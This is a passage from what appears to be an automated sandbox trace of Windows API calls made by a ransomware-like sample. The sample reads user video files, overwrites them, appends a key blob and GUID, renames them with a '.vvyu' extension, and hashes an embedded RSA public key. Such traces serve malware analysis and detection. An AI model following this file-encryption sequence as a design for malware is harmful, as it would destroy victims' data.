RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6578 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65d8 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65f0 [0196.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6590 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6560 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea0f8 | out: hHeap=0x2c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.083] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x82a9, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x82a9, lpOverlapped=0x0) returned 1 [0196.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.084] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x82ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.084] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0196.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0196.085] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.086] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.086] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.086] CloseHandle (hObject=0x584) returned 1 [0196.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0196.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0196.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0196.088] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\P5dr5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\p5dr5.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\P5dr5.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\p5dr5.mp4.vvyu")) returned 1 [0196.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.090] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0196.093] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf47d0770, ftCreationTime.dwHighDateTime=0x1d8a5c3, ftLastAccessTime.dwLowDateTime=0xee9fb900, ftLastAccessTime.dwHighDateTime=0x1d8a6eb, ftLastWriteTime.dwLowDateTime=0xee9fb900, ftLastWriteTime.dwHighDateTime=0x1d8a6eb, nFileSizeHigh=0x0, nFileSizeLow=0x132a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RpFnCBUaRW4M2CKB6Y8.avi", cAlternateFileName="RPFNCB~1.AVI")) returned 1 [0196.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0196.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0196.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0196.093] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\RpFnCBUaRW4M2CKB6Y8.avi") returned=".avi" [0196.093] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\RpFnCBUaRW4M2CKB6Y8.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\rpfncbuarw4m2ckb6y8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.094] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=78498) returned 1 [0196.094] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.098] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1327c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.098] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.100] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.100] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x132a2, lpOverlapped=0x0) returned 1 [0196.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.102] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.102] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.102] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.103] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.103] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.103] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.103] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.103] GetLastError () returned 0x0 [0196.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.103] GetLastError () returned 0x0 [0196.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.104] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.104] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.104] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.104] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.104] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x132a0) returned 0x2af5168 [0196.105] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea0f8 [0196.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea140 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.106] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6590 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6578 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.109] GetCurrentThreadId () returned 0x5d8 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8a48 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 